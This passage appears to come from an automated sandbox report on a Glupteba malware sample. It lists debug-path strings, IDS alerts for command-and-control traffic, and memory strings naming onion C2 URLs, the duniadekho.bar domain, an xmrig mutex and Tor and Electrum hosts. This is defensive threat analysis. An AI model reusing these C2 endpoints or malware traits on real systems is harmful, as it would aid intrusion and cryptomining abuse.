        Source: Binary string: '(EfiGuardDxe.pdbx source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ZZC:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: System.Management.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
        Source: Binary string: System.Management.ni.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: or you do not have access permission to the .pdb location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Transactions.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
        Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Transactions.ni.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
        Source: Binary string: C:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: System.Numerics.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: System.Core.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp

        Networking

        Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:49990 -> 185.82.216.50:443
        Source: Traffic Snort IDS: 2045697 ET TROJAN DNS Query to Glupteba Domain (twopixis .com) 192.168.11.20:49827 -> 1.1.1.1:53
        Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:49993 -> 185.82.216.50:443
        Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:49998 -> 185.82.216.50:443
        Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:50002 -> 185.82.216.50:443
        Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:50007 -> 185.82.216.50:443
        Source: Traffic Snort IDS: 2045697 ET TROJAN DNS Query to Glupteba Domain (twopixis .com) 192.168.11.20:63997 -> 1.1.1.1:53
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d0c9d&uuid=ec87b504-92ea-4d22-a937-161700799581
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d0c9d&uuid=ec87b504-92ea-4d22-a937-161700799581erver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionPUser-Agent: Go-http-client/1.1
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion:80
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Fserver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion:80
        Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll
        Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: COMPUTERNAME=computerNUMBER_OF_PROCESSORS=16PROCESSOR_REVISION=9e0dPUBLIC=C:\Users\PublicSystemRoot=C:\WindowsC:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466xeSELECT BuildNumber FROM Win32_OperatingSystemGlobal\xmrigMUTEX31337http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exechallenge=e5ec22ece8aaafba&country_code=US&uuid=ec87b504-92ea-4d22-a937-161700799581server5.duniadekho.bar
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: SELECT BuildNumber FROM Win32_OperatingSystemGlobal\xmrigMUTEX31337http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNPpuSomC.exeHKEY_USERS\S-1-5-21-3425316567-2969588382-3778222414-1001\Software\Microsoft\e4d2c4f7nnHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exe
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4E6000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.mscLOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\LocalPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.msc
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.exenhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.batstAppC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.cmdd2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.vbsd2c4f7http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.vbed2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.js4d2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.jsed2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.wshd2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.mscd2c4f7APPDATA=C:\Windows\system32\config\systemprofile\AppData\Roamingt\e4d2c4f7LOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\Local4d2c4f7PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 13, GenuineIntel7PROCESSOR_LEVEL=6TEMP=C:\Windows\TEMPTMP=C:\Windows\TEMPUSERDOMAIN=WORKGROUPUSERNAME=computer$windir=C:\WindowsZES_ENABLE_SYSMAN=1LOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\LocalPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 13, GenuineIntel
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4E4000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://duniadekho.barhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionCommonProgramW6432=C:\Program Files\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCommonProgramW6432=C:\Program Files\Common Files
        Source: csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not 